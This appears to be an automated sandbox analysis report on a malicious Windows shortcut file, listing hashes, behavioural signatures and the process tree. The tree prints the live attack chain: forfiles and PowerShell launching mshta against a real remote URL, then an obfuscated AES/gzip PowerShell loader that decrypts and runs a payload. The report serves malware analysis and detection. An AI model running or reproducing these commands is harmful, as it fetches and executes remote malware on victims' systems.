Analysis

max time kernel: 120s
max time network: 120s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
submitted: 05-03-2024 02:01

Static task: static1

Behavioral task: behavioral1
  Sample: 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
  Resource: win7-20240220-en

Behavioral task: behavioral2
  Sample: 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
  Resource: win10v2004-20240226-en
General

Target: 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
Size: 1KB
MD5: 53388b72e46cbc4a0110d3b6d0c0f930
SHA1: 46881d02e2249c29ff212eb0bf15ce07828ae519
SHA256: 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
SHA512: 00646615c24cf58f28dfbd6a373f981f85738ec35ca91ef4816198fbc80573ce249083c7df60fdd0a63b42fa1e8011901555be8f5b8181490f2d767a085dc885
Malware Config

Extracted URL: http://91.92.251.35/Downloads/Ten/photoshop
Signatures

Blocklisted process makes network request (1 IoC)
  Processes: mshta.exe
  flow | pid  | process
  3    | 2264 | mshta.exe

Drops file in Windows directory (3 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe
  description                  | ioc                                                                                                                     | process
  File opened for modification | C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings (1 IoC)
  Processes: mshta.exe
  description | ioc                                                                                                   | process
  Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe
  pid  | process
  2468 | powershell.exe
  2548 | powershell.exe
  2080 | powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe
  description             | pid  | process
  Token: SeDebugPrivilege | 2468 | powershell.exe
  Token: SeDebugPrivilege | 2548 | powershell.exe
  Token: SeDebugPrivilege | 2080 | powershell.exe

Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: cmd.exe, forfiles.exe, powershell.exe, mshta.exe, powershell.exe
  description                      | pid  | process        | target process
  PID 2868 wrote to memory of 2608 | 2868 | cmd.exe        | forfiles.exe
  PID 2608 wrote to memory of 2468 | 2608 | forfiles.exe   | powershell.exe
  PID 2468 wrote to memory of 2264 | 2468 | powershell.exe | mshta.exe
  PID 2264 wrote to memory of 2548 | 2264 | mshta.exe      | powershell.exe
  PID 2548 wrote to memory of 2080 | 2548 | powershell.exe | powershell.exe
  (each of the five rows above is reported three times, giving 15 IoCs)
Processes

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
   - Suspicious use of WriteProcessMemory
   PID: 2868

   2. C:\Windows\System32\forfiles.exe
      Command line: "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop
      - Suspicious use of WriteProcessMemory
      PID: 2608

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: start mshta http://91.92.251.35/Downloads/Ten/photoshop
         - Drops file in Windows directory
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         PID: 2468

         4. C:\Windows\system32\mshta.exe
            Command line: "C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop
            - Blocklisted process makes network request
            - Modifies Internet Explorer settings
            - Suspicious use of WriteProcessMemory
            PID: 2264

            5. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = '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';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -
               - Drops file in Windows directory
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of AdjustPrivilegeToken
               - Suspicious use of WriteProcessMemory
               PID: 2548

               6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                  - Drops file in Windows directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 2080
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: e7e999130df882fd5027d857b21f2526
  SHA1: c100ff6c70e3e8be70c2045aa4ba1bc3834006ed
  SHA256: 7d9ff825b357ce14f5a689ff8b99e6b92457296a83de2e0f01c6070909433af7
  SHA512: 9591541885a94e97d36c693fe49a64c6be315e9d45eb46350bd5e1e482dcc8d14159f8f6175ef1ed87c81f686b938fa354f2b83b82c34f0c29197fd8dbd7c6ac